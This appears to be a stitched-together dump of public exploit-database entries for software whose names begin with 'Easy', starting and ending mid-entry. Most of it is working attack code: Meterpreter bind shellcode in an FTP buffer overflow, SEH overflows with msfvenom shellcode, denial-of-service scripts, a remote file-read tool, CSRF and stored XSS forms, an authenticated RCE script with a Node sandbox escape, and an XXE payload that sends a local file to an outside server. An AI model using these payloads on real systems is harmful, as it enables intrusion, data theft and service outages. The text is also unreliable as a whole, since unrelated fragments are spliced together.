"\x83\xc4\x5a"
"\x83\xc4\x5a"
"\x83\xc4\x5a"
"\x83\xc4\x5a"
"\x83\xc4\x5a"
"\x83\xc4\x3b"
"\xc7\x04\x24\xd8\xd1\xec\xf7"
"\x89\xdc"
"\x31\xdb"
)
#
#shellcode: windows/meterpreter/bind_tcp on port 4444
#
stage1=(
"\x31\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xf8\x6c\x9c\xb0\x83\xee\xfc\xe2\xf4\x04\x84\x15\xb0\xf8\x6c"
"\xfc\x39\x1d\x5d\x4e\xd4\x73\x3e\xac\x3b\xaa\x60\x17\xe2\xec"
"\xe7\xee\x98\xf7\xdb\xd6\x96\xc9\x93\xad\x70\x54\x50\xfd\xcc"
"\xfa\x40\xbc\x71\x37\x61\x9d\x77\x1a\x9c\xce\xe7\x73\x3e\x8c"
"\x3b\xba\x50\x9d\x60\x73\x2c\xe4\x35\x38\x18\xd6\xb1\x28\x3c"
"\x17\xf8\xe0\xe7\xc4\x90\xf9\xbf\x7f\x8c\xb1\xe7\xa8\x3b\xf9"
"\xba\xad\x4f\xc9\xac\x30\x71\x37\x61\x9d\x77\xc0\x8c\xe9\x44"
"\xfb\x11\x64\x8b\x85\x48\xe9\x52\xa0\xe7\xc4\x94\xf9\xbf\xfa"
"\x3b\xf4\x27\x17\xe8\xe4\x6d\x4f\x3b\xfc\xe7\x9d\x60\x71\x28"
"\xb8\x94\xa3\x37\xfd\xe9\xa2\x3d\x63\x50\xa0\x33\xc6\x3b\xea"
"\x87\x1a\xed\x90\x5f\xae\xb0\xf8\x04\xeb\xc3\xca\x33\xc8\xd8"
"\xb4\x1b\xba\xb7\x07\xb9\x24\x20\xf9\x6c\x9c\x99\x3c\x38\xcc"
)
#patch=("\xd8\xd1\xec\xf7")
stage2=(
"\xb0\x07\xb9\xcc\xe0\xa8\x3c\xdc\xe0\xb8\x3c"
"\xf4\x5a\xf7\xb3\x7c\x4f\x2d\xe5\x5b\x81\x23\x3f\xf4\xb2\xf8"
"\x7d\xc0\x39\x1e\x06\x8c\xe6\xaf\x04\x5e\x6b\xcf\x0b\x63\x65"
"\xab\x3b\xf4\x07\x11\x54\x63\x4f\x2d\x3f\xcf\xe7\x90\x18\x70"
"\x8b\x19\x93\x49\xe7\x71\xab\xf4\xc5\x96\x21\xfd\x4f\x2d\x04"
"\xff\xdd\x9c\x6c\x15\x53\xaf\x3b\xcb\x81\x0e\x06\x8e\xe9\xae"
"\x8e\x61\xd6\x3f\x28\xb8\x8c\xf9\x6d\x11\xf4\xdc\x7c\x5a\xb0"
"\xbc\x38\xcc\xe6\xae\x3a\xda\xe6\xb6\x3a\xca\xe3\xae\x04\xe5"
"\x7c\xc7\xea\x63\x65\x71\x8c\xd2\xe6\xbe\x93\xac\xd8\xf0\xeb"
"\x81\xd0\x07\xb9\x27\x50\xe5\x46\x96\xd8\x5e\xf9\x21\x2d\x07"
"\xb9\xa0\xb6\x84\x66\x1c\x4b\x18\x19\x99\x0b\xbf\x7f\xee\xdf"
"\x92\x6c\xcf\x4f\x2d\x6c\x9c\xb0"
)
#009BFD5D where to jmp
buffer = "\x90" * (258 - (len(patch) + len(stage1))) + patch + "\x90"*10 + stage1 + "\x5d\xfd\x9b\x00" + stage2 + "\x90" * 50
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
## Connects and receives the banner
s.connect((hostname, port))
a = s.recv(1024)
print a
s.send("user " + username + "\r\n")
a =s.recv(1024)
print a
s.send("pass " + password + "\r\n")
a = s.recv(1024)
print a
s.send("APPE " + buffer + "\r\n")
s.close()
# EOF
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
================
easycom-aura.com
Product:
===========
SQL iPlug
EasycomPHP_4.0029.iC8im2.exe
SQL iPlug provides System i applications real-time access to heterogeneous and external databases
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2017-5359
Security Issue:
================
SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
HTTP requests fed to the "D$EVAL" parameter.
Exploit/POC:
============
import socket
print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'
IP = raw_input("[IP]> ")
PORT = 7078
payload="A"*43000
arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((IP,PORT)))
arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
c+=1
print "doit!"
except socket.error:
print "[*] 5th ave 12:00"
raw_input()
break
Disclosure Timeline:
======================================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure
Network Access:
===============
Remote
Severity:
===========
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
================
easycom-aura.com
Product:
===========================
EASYCOM AS400 (iBMI) PHP API
EasycomPHP_4.0029.iC8im2.exe
EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
Windows, Linux, and IBMi.
EasyCom tested here requires older version of PHP.
Setup test environment:
Windows 7
XAMPP 1.7.3
PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0
PHP compiled module API=20090626 (need to use for EasyCom IBM DLL)
Vulnerability Type:
=========================
API Stack Buffer Overflow
CVE Reference:
==============
CVE-2017-5358
Security Issue:
================
EasyCom PHP API suffers from multiple Buffer Overflow entry points, which can result in arbitrary code execution on affected system.
Below I provide some proof of concept details for a few of them.
EAX 00000000
ECX 41414141
EDX 771D6ACD ntdll.771D6ACD
EBX 00000000
ESP 00C0F238
EBP 00C0F258
ESI 00000000
EDI 00000000
EIP 41414141
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
SEH chain of main thread
Address SE handler
00C0F354 kernel32.7600410E
00C0FF78 42424242
52525252 *** CORRUPT ENTRY ***
WinDbg dump...
(720.a70): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000
eip=41414141 esp=004111e8 ebp=00411208 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:000> !load winext/msec
0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141
called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411)
User mode DEP access violations are exploitable.
PHP Crash:
=============
Problem signature:
Problem Event Name: BEX
Application Name: php.exe
Application Version: 5.3.1.0
Application Timestamp: 4b06c430
Fault Module Name: StackHash_e98d
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 00000000
Exception Offset: 41414141
Exception Code: c0000005
Exception Data: 00000008
OS Version: 6.1.7601.2.1.0.256.48
Exploit/POC:
===============
php_Easycom5_3_0.dll 0day vuln POC minus the exploit, I'm bored goin to the park.
<?php
/* Basic connection to an AS400 iBMI System */
$payload=str_repeat("A", 4000); #BOOM!
$payload=str_repeat("A",1868)."RRRRBBBB".str_repeat("\x90",100); #SEH
$conn = i5_connect($payload, "QPGMR", "PASSW") or die(i5_errormsg()); #VULN
$conn = i5_pconnect($payload, 'QSECOFR', 'password', array() ); #VULN
$conn = i5_private_connect($payload, $user, $password, array()); #VULN
echo 'EasyCom PHP API 0day ' . $conn;
?>
Network Access:
===============
Remote
Severity:
==========
High
Disclosure Timeline:
======================================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
#!/usr/bin/python -w
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Download Link: http://www.tinasoft.com/Download/easysetup.exe
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload file from the server to a client.
# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,
# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,
# and does not check if it has sent the UDP request which gives us full Read access to the system.
#
#EDB Note: Code my need some adjusting
import socket
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
IP = "192.168.43.36" # Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43" + file_to_read
hex_value = ''.join(x.encode('hex') for x in file_to_read)
fill = "\x00"
end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"
try:
data = s.recv(261) # Get header
while data:
data = s.recv(2048)
print data
except Exception:
print "[+] https://www.infogen.al/ [+]"
finally:
s.close()
# Exploit Title: Easyboot 6.6.0 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-22
# Homepage: http://www.ezbsystems.com/
# Software Link: http://www.ezbsystems.com/easyboot/download.htm
# Tested Version: 6.6.0
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window click "File" > "Tools" > "Replace Text...". Now paste the content of
# "exploit.txt" into all three fields in the new window. Click "Replace" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 7000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
# Author: indoushka
# Date: 2020-02-20
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
# Vendor: http://easy2pilot-v7.com/
# CVE: N/A
#poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] save code as poc.html
[+]
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
</tr>
</table>
<br/><br/>
<form action="https://immosl.lu/admin.php?action=add_user" method="POST">
<table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
<tr>
<td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
</tr>
<tr>
<td class="tah11" align="right">Nom d'utilisateur :</td>
<td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
</tr>
<tr>
<td class="tah11" align="right">Mot de passe : </td>
<td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
</tr>
<tr>
<td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
</tr>
</table>
</form><br/><br/>
<div>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
Easy!Appointments v1.2.1 Multiple Stored XSS Vulnerabilities
Vendor: Alex Tselegidis
Product web page: http://www.easyappointments.org
Affected version: 1.2.1
Summary: Easy!Appointments is a highly customizable web application
that allows your customers to book appointments with you via the web.
Moreover, it provides the ability to sync your data with Google Calendar
so you can use them with other services. It is an open source project
and you can download and install it even for commercial use. Easy!Appointments
will run smoothly with your existing website, because it can be installed
in a single folder of the server and of course, both sites can share
the same database. Learn more about the project in the Features page.
Desc: The application suffers from multiple stored and reflected XSS
vulnerabilities. The issues are triggered when an unauthorized input
passed via multiple POST and GET parameters is not properly sanitized
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: Apache/2.4.23 (Win32)
OpenSSL/1.0.2h
MariaDB-10.1.19
PHP/5.6.28
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5442
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5442.php
20.10.2017
--
PoC:
{"name":"XSS1","description":"Description"}
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/backend_api/ajax_save_service_category" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="category" value="{"name":"XSS1","description":"Description"}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="service_id" value='"><script>alert(2)</script>' />
<input type="hidden" name="provider_id" value="85" />
<input type="hidden" name="selected_date" value="2017-11-30" />
<input type="hidden" name="service_duration" value="30" />
<input type="hidden" name="manage_mode" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="service_id" value="13" />
<input type="hidden" name="provider_id" value="85" />
<input type="hidden" name="selected_date" value="<marquee>" />
<input type="hidden" name="service_duration" value="30" />
<input type="hidden" name="manage_mode" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_register_appointment" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="post_data[customer][last_name]" value="sdadsd" />
<input type="hidden" name="post_data[customer][first_name]" value="asdasd" />
<input type="hidden" name="post_data[customer][email]" value="asdasd@bbb.dd" />
<input type="hidden" name="post_data[customer][phone_number]" value="1112223333" />
<input type="hidden" name="post_data[customer][address]" value="" />
<input type="hidden" name="post_data[customer][city]" value="" />
<input type="hidden" name="post_data[customer][zip_code]" value="" />
<input type="hidden" name="post_data[appointment][start_datetime]" value=""><script>alert(3)</script>" />
<input type="hidden" name="post_data[appointment][end_datetime]" value="2017-11-30 16:00:00" />
<input type="hidden" name="post_data[appointment][notes]" value="" />
<input type="hidden" name="post_data[appointment][is_unavailable]" value="false" />
<input type="hidden" name="post_data[appointment][id_users_provider]" value="85" />
<input type="hidden" name="post_data[appointment][id_services]" value="13" />
<input type="hidden" name="post_data[manage_mode]" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/08/2021
# Exploit Author: LionTree
# Vendor Homepage: https://github.com/easy-mock
# Software Link: https://github.com/easy-mock/easy-mock
# Version: 1.5.0-1.6.0
# Tested on: windows 10(node v8.17.0)
import requests
import json
import random
import string
target = 'http://127.0.0.1:7300'
username = ''.join(random.sample(string.ascii_letters + string.digits, 8))
password = ''.join(random.sample(string.ascii_letters + string.digits, 8))
print(username)
print(password)
# can't see the result of command
cmd = 'calc.exe'
# register
url = target + "/api/u/register"
cookies = {"SSO_LANG_V2": "EN"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
json_data={"name": username, "password": password}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# login
url = target + "/api/u/login"
cookies = {"SSO_LANG_V2": "EN"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
json_data={"name": username, "password": password}
req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text
login = json.loads(req)
token = login['data']['token']
# create project
url = target + "/api/project/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# get project_id
url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
req = requests.get(url, headers=headers, cookies=cookies).text
projects = json.loads(req)
project_id = projects['data'][0]['_id']
# create mock
url = target + "/api/mock/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
json_data={"description": "poc", "method": "get", "mode": "{\n 'foo': 'Syntax Demo',\n 'name': function() {\n return (function() {\n TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n try {\n Object.preventExtensions(Buffer.from(\"\")).a = 1;\n } catch (e) {\n return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n }\n })();\n }\n}", "project_id": project_id, "url": "/" + username}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# preview mock
url = target + "/mock/{}/{}/{}".format(project_id,username,username)
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
requests.get(url, headers=headers, cookies=cookies)
# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
# Date: 2019-11-22
# Exploit Author: Rene Cortes S
# Vendor Homepage: https://easy-hide-ip.com
# Software Link: https://easy-hide-ip.com
# Version: 5.0.0.3
# Tested on: Windows 7 Professional Service Pack 1
##########################################################################################################################
Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
EasyRedirect EasyRedirect C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe Auto
##############################################################################################################################################
Service info:
C:\Users\user>sc qc EasyRedirect
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: EasyRedirect
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : EasyRedirect
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#########################################################################################################################
# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection
# Exploit Author: Javier Olmedo
# Date: 2018-11-21
# Vendor: Richard Wuerflein
# Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe
# Affected Version: 1.7.8 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19031
# References:
# https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/
# 1. Technical Description
# Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability
# through the malicious XML file. This allows a malicious user to read arbitrary files.
# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection.
python -m SimpleHTTPServer 80
# 2.2 Upload the payload.dtd file to your web server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
%all;
# 2.3 Create a SECRET.TXT file with any content in desktop.
# 2.4 Open poc.xml
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\Users\<USER>\Desktop\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
# 2.5 Your web server will receive a request with the contents of the secret.txt file
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
# 3. Timeline
# 13, november 2019 - [RESEARCHER] Discover
# 13, november 2019 - [RESEARCHER] Report to vendor support
# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
# 22, november 2019 - [RESEARCHER] Public disclosure
# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: Easy WMV/ASF/ASX to DVD Burner 2.3.11 - 'Enter User
Name' Field Buffer Overflow (SEH)
# Date: 28-08-2017
# Website: www.touhidshaikh.com
# Vulnerable Software: Easy WMV/ASF/ASX to DVD Burner
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 2.3.11
# Software Link: http://www.divxtodvd.net/easy_wmv_to_dvd.exe
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of calc.txt
#
#========================================================================================================================
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
[SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
data = buffer + nSEH + SEH + nops + buf
f = open ("calc.txt", "w")
f.write(data)
f.close()
#Greetz => Jack Carlo
# # # # #
# Exploit Title: Easy Web Search 4.0 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164
# Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/
# Version: 4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
